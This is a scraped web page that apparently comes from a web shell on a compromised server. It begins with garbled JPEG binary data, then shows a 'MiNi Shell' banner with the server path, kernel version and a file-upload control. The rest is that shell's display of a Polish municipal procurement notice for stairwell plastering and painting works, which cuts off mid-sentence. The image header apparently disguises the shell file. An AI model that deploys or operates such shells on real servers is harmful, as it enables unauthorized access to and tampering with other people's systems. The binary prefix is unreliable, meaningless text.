JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210531/0006862801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00068628 z dnia 2021-05-31</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Realizacja Decyzji PINB – Etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Siemianowice Śląskie-Urząd Miasta Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255453</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ratusz@um.siemianowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.siemianowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka sektora finansów publicznych </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Miejskie Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">643-000-02-99</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Śmiłowskiego 15</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">mpgkim@mpgkim.com.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.mpgkim.com.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja Decyzji PINB – Etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-838da443-c1d3-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00068628</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000760/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.26 Realizacja Decyzji PINB - Etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mpgkim.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>zostały opisane poniżej: 3.1. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie<br/>danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych<br/>przesyłanych przez Internet. Wykonawca posiadający konto na Platformie ma dostęp do możliwości<br/>złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do<br/>treści SWZ oraz komunikację z Prowadzącym postępowanie w pozostałych obszarach. 3.2.<br/>Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy: a. Dopuszczalne<br/>przeglądarki internetowe: • każdy program który służy do otwierania protokołów HTTPS z włączonym<br/>Java Script b. Pozostałe wymagania techniczne: • dostęp do sieci Internet • zainstalowane środowisko<br/>uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy • program<br/>umożliwiający otwarcie dokumentów edytowalnych w formacie .doc, .docx, .xls, .xlsx, .odt, .ods. •<br/>program umożliwiający otwarcie dokumentów w formacie .pdf. • program umożliwiający otwarcie plików<br/>skompresowanych .7zip lub .zip. c. Wspierane są rozwiązania dostarczane przez firmy: • Polskie<br/>Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A. •<br/>Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A. • Powszechne<br/>Centrum Certyfikacji Certum firmy Asseco Data Systems S.A. (dawniej: Unizeto Technologies SA.) •<br/>Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A. 3.3. Kodowanie i<br/>oznaczenie czasu przekazania danych: Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS.<br/>Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich wpływu<br/>na Platformę, a nie datę wykonanie danej czynności przez Wykonawcę na Platformie</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.mpgkim.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że: 1. Administratorem Pana/Pani danych<br/>osobowych jest Prezydent Miasta Siemianowice Śląskie z siedzibą w Siemianowicach Ślaskich przy ul.<br/>Jana Pawła II 10;2. Inspektor Ochrony Danych Osobowych ma swoją siedzibę w Urzędzie Miasta<br/>Siemianowice Śląskie przy ul. Jana Pawła II 10, e-mail: iod@um.siemianowice.pl, tel. 32 760 52 823.<br/>Podmiotem przetwarzającym dane osobowe jest Miejskie Przedsiębiorstwo Gospodarki Komunalnej i<br/>Mieszkaniowej Sp. z o. o. z siedzibą w Siemianowicach Śląskich przy ul. Śmiłowskiego 15 KRS:<br/>0000096696 nr tel. 32 766 0 00 e-mail: mpgkim@mpgkim.com.pl na podstawie umowy na:<br/>Świadczenie usług w zakresie zarządzania mieszkaniowym zasobem Gminy Siemianowice Śląskie z<br/>dnia 08.12.2017r. oraz umowy powierzenia przetwarzania danych osobowych z dnia 23.05.2018r. 4.<br/>Pana/Pani dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego pn.: Realizacja Decyzji PINB – Etap I (znak<br/>sprawy: ZP-MPGKiM/27/V/2021)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-MPGKiM/27/V/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja Decyzji PINB – Etap IUsunięcie nieprawidłowości stanu technicznego budynku<br/>dotyczącej zalewania klatki schodowej w Siemianowicach Śląskich przy ul. Sobieskiego<br/>2.Szczegółowy opis przedmiotu zawiera:- Dodatek nr4 do SWZ- Przedmiar robót, STWOiRB </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45410000-4 - Tynkowanie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.1. Zgodnie z art. 223 ust. 2 ustawy Pzp, Prowadzący postępowanie,<br/>poprawi w tekście oferty oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem<br/>konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z<br/>dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając<br/>o tym Wykonawcę, którego oferta została poprawiona. 2.2. Obliczenie liczby punktów przyznanych<br/>każdej ofercie zostanie dokonane na podstawie poniższego wzoru:K = K1 + K2gdzie:K – liczba<br/>punktów przyznanych ofercie,K1 – liczba punktów przyznanych w kryterium cena,K2 – liczba punktów<br/>przyznanych w kryterium wysokość karty umownej 2.3. W trakcie składania ofert kolejnym ocenianym<br/>ofertom przyznawane są punkty za powyższe kryteria według następujących zasad: 2.3.1. za kryterium<br/>cena (K1)K1 = (Cmin / Cn) x 100 pkt x 60%gdzie:K1 – liczba punktów przyznanych ofercie za kryterium<br/>cenoweCmin – cena minimalna wśród ważnych ofertCn – cena zaproponowana przez Wykonawcę<br/>n2.3.2. za kryterium wysokość kary umownej, punkty będą przyznane w przypadku zadeklarowania<br/>przez Wykonawcę wysokości kary umownej wyższej niż minimalna wysokość kary umownej za<br/>opóźnienie w wykonaniu przedmiotu umowy wynoszącej 0,4 % wynagrodzenia brutto – za każdy dzień<br/>opóźnienia, licząc od dnia następnego po upływie terminu umownego.Wykonawca z tego tytułu uzyska<br/>odpowiednio:0 punktów – za zadeklarowaną karę umowną w wysokości 0,5 %20 punktów – za<br/>zadeklarowaną karę umowną w wysokości 0,6 % 40 punktów – za zadeklarowaną karę umowną w<br/>wysokości 0,7 % i większąDotyczy postanowień zawartych w § 8 ust. 2 lit. a) umowy.Wykonawca<br/>winien wpisać wysokość kary umownej w Formularzu Ofertowym (Dodatek nr 1 do SWZ). Wysokość<br/>kary umownej winna być podana przez Wykonawcę z dokładnością do 1 (jednego) miejsca po<br/>przecinku. W przypadku zadeklarowania przez Wykonawcę wysokości kary umownej z dokładnością inną (2 miejsca po przecinku i więcej) niż wymagana Prowadzący postępowanie odrzuci każdą kolejną<br/>cyfrę i przydzieli punkty j/w. 3. W przypadku braku złożonej deklaracji kary umownej w formularzu<br/>ofertowym Prowadzący postępowanie przyjmie, jako podstawę do oceny, najniższy wymiar kary, a<br/>oferta otrzyma „0” punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1.1. nie podlegają<br/>wykluczeniu, 1.2. spełniają następujące warunki dotyczące: 1.2.1. zdolności do występowania w<br/>obrocie gospodarczym: Prowadzący postępowanie nie stawia warunku w tym zakresie 1.2.2.<br/>uprawnień do przeprowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów: Prowadzący postępowanie nie stawia warunku w tym<br/>zakresie 1.2.3. sytuacji ekonomicznej lub finansowej:Wykonawca winien wykazać, iż posiada<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia, o wysokości sumy ubezpieczenia nie mniejszej niż 100.000,00 zł<br/>1.2.4. zdolności technicznej lub zawodowej:a) Wykonawca winien wykazać, że w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał w sposób należyty i prawidłowo ukończył co<br/>najmniej 3 roboty budowlane polegające na wykonaniu robót ogólnobudowlanych o wartości<br/>30.000,00 zł brutto każda.Uwaga:– jako zamówienia potwierdzające spełnienie warunków<br/>zdolności technicznej lub zawodowej, Prowadzący postępowanie rozumie roboty budowlane<br/>zrealizowane (czyli zakończone i odebrane protokołem częściowym lub końcowym) polegające<br/>na wykonaniu robót budowlanych, o których mowa powyżej,– w przypadku, gdy ww. zakres<br/>robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany<br/>jest w „Wykazie wykonanych robót budowlanych” wyodrębnić rodzajowo i kubaturowo roboty, o<br/>których mowa powyżej,- w sytuacji składania oferty przez dwa lub więcej podmiotów<br/>(Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w<br/>Rozdziale XIX SWZ, warunek o którym wyżej mowa musi zostać spełniony w całości przez<br/>Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego<br/>zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania<br/>doświadczenia.b) Wykonawca winien wykazać, że dysponuje (dysponuje lub będzie<br/>dysponować) co najmniej niżej wymienionymi osobami:- Kierownikiem budowy (1 osoba)<br/>posiadającym kwalifikacje zawodowe, tj. uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno - budowlanej, wydane na podstawie ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane (tj. Dz. z 2019r. poz.1186 z późn. zm) i Rozporządzenia Ministra Inwestycji i<br/>Rozwoju z dnia 29 kwietnia 2019r. W sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. Poz. 831) lub<br/>odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.Dopuszcza się równoważne kwalifikacje, zdobyte w innych<br/>państwach, na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994r. Prawo budowlane,<br/>z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016r,<br/>poz. 65). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 104 ust. 1 pkt 4) ustawy Pzp,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Opłaconej polisy, z której wynika iż Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>o wysokości sumy ubezpieczenia nie mniejszej niż 100.000,00 zł7.2. Wykazu wykonanych robót.<br/>Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał w sposób należyty i<br/>prawidłowo ukończył co najmniej 3 roboty budowlane polegające na wykonaniu robót<br/>ogólnobudowlanych o wartości 30.000,00 zł brutto każda.7.3. Wykazu osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami, tj. Wykaz, z którego wynika, że wykonawca dysponuje<br/>(dysponuje lub będzie dysponować) co najmniej niżej wymienionymi osobami:- Kierownikiem budowy<br/>(1 osoba) posiadającym kwalifikacje zawodowe, tj. uprawnienia do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno - budowlanej, wydane na podstawie ustawy z dnia 7 lipca 1994r. Prawo<br/>budowlane (tj. Dz. z 2019r. poz.1186 z późn. zm) i Rozporządzenia Ministra Inwestycji i Rozwoju z<br/>dnia 29 kwietnia 2019r. W sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. z 2019r. Poz. 831) lub odpowiadające im ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.Dopuszcza się<br/>równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12a ustawy z<br/>dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r.<br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. 2016r, poz. 65).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Ustala się obowiązek wniesienia przez wykonawcę wadium w wysokości: 1.000,00 zł (słownie:<br/>jeden tysiąc zł 00/100),2. Wadium wnosi się przed upływem terminu składania ofert.3. Wadium<br/>może być wnoszone w jednej lub kilku następujących 